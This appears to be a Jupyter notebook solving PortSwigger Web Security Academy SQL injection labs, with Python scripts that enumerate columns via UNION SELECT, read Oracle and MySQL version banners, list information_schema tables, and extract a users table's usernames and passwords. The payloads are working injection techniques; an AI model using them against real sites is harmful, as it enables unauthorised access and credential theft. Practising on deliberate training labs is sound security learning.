https://portswigger.net/web-security/sql-injection/examining-the-database

# Question 1 : Oracle


https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft

In [45]:
import requests

URL = "https://ac1e1f461e951c0c80ae807400e0008c.web-security-academy.net/"

#Work out how many columns the returned query has
results = []
for x in range(1, 5):
    #NB we need to add "FROM DUAL" because this is an oracle database
    query = "filter?category='+UNION+SELECT+{}+FROM+DUAL--".format(("NULL," * x)[:-1])
    r = requests.get(URL + query)
    results.append(r)
print(results)

[<Response [500]>, <Response [200]>, <Response [500]>, <Response [500]>]


From the responses we can see that we have two columns returned. 

Next we want to work out which field will accept string data types:

In [46]:
results = []

n_columns = 2
for x in range(n_columns):
    NULLs = ["NULL"]*n_columns
    NULLs[x] = "\'a\'"
    query = "filter?category='+UNION+SELECT+{}+FROM+DUAL--".format(",".join(NULLs))
    r = requests.get(URL + query)
    results.append(r)
print(results)

[<Response [200]>, <Response [200]>]


Either of the two columns seem to be compatible with text. 

Ok so now that we've done the reconnaissance let's actually run our union attack to get the database information.

One quick thing to note here is that Oracle returns the database information in a single column with the heading "BANNER". Since the original database has two columns we need to add a column to our query so the UNION works.

In [47]:
#Final payload
query = "filter?category='+UNION+SELECT+BANNER,'a'+FROM+V$VERSION--"
r = requests.get(URL + query)

Success!

# Question 2 : MySQL

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft

In [62]:
import requests

URL = "https://ac131f981fa34dc980990ee8009800aa.web-security-academy.net/"

#Work out how many columns the returned query has
results = []
for x in range(1, 5):
    #NB we need to add a space after the comment for MySQL
    query = "filter?category=' UNION SELECT+{}-- ".format(("NULL," * x)[:-1])
    r = requests.get(URL + query)
    results.append(r)
print(results)

[<Response [500]>, <Response [200]>, <Response [500]>, <Response [500]>]


As in the oracle case we have two columns.

Now lets check which are text compatible:


In [67]:
#Work out how many columns the returned query has
results = []
n_columns = 2
for x in range(n_columns):
    NULLs = ["NULL"] * n_columns
    NULLs[x] = "\'a\'"
    #NB we need to add a space after the comment for MySQL
    query = "filter?category=' UNION SELECT+{} -- ".format(",".join(NULLs))
    r = requests.get(URL + query)
    results.append(r)
print(results)

[<Response [200]>, <Response [200]>]


Once again both columns are string compatible. Cool. Ok now for the payload.

In [83]:
#Final payload
query = "filter?category=' UNION SELECT NULL,@@version -- "
r = requests.get(URL + query)
print(r)

<Response [200]>


Yay it worked! Now we just need to paste it into the PortSwigger lab.

In [84]:
query.replace(" ", "+")

"filter?category='+UNION+SELECT+NULL,@@version+--+"

# Question 3: Getting Database Info (Non-oracle)
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle

We can assument that we know the original query returns two columns, and that both of them are string compatible.

To grab the database information, we'll UNION inject. To make the dimensions of the union injection match the original query we will concatenate the columns.

In [39]:
import requests

i_s = "information_schema"
URL = "https://ac4a1f791e6257cf804939c500b400ca.web-security-academy.net/"
query = f"filter?category=' UNION SELECT CONCAT(TABLE_NAME, '~', TABLE_TYPE),NULL FROM {i_s}.tables -- "

r = requests.get(URL + query)
r

<Response [200]>

Ok this appears to work. There are a lot of tables returned. Let's print them out:

In [51]:
import re

tables = [x.split("~") for x in re.findall(r"<th>(.*)</th>", r.text)]

#print only BASE TABLEs and tables without "pg_"
base_tables = [x[0] for x in tables if (x[1]=="BASE TABLE" and not "pg_" in x[0])]
base_tables

['sql_parts',
 'products',
 'sql_languages',
 'sql_sizing',
 'users_yxfmuy',
 'sql_implementation_info',
 'sql_sizing_profiles',
 'sql_packages',
 'sql_features']

In [53]:
table_name = "users_yxfmuy"

query = f"filter?category=\' UNION SELECT CONCAT(COLUMN_NAME, \'~\', DATA_TYPE),NULL " + \
f"FROM {i_s}.columns WHERE TABLE_NAME = \'{table_name}\' -- "

r = requests.get(URL + query)
r

<Response [200]>

In [54]:
import re

tables = [x.split("~") for x in re.findall(r"<th>(.*)</th>", r.text)]

tables

[['password_cctbkm', 'character varying'],
 ['username_prihbh', 'character varying']]

OK that looks pretty promising!

Lets grab those!

In [55]:
query = f"filter?category=\' UNION SELECT CONCAT(username_prihbh, \'~\', password_cctbkm),NULL " + \
f"FROM {table_name} -- "

r = requests.get(URL + query)
r

<Response [200]>

In [ ]:
r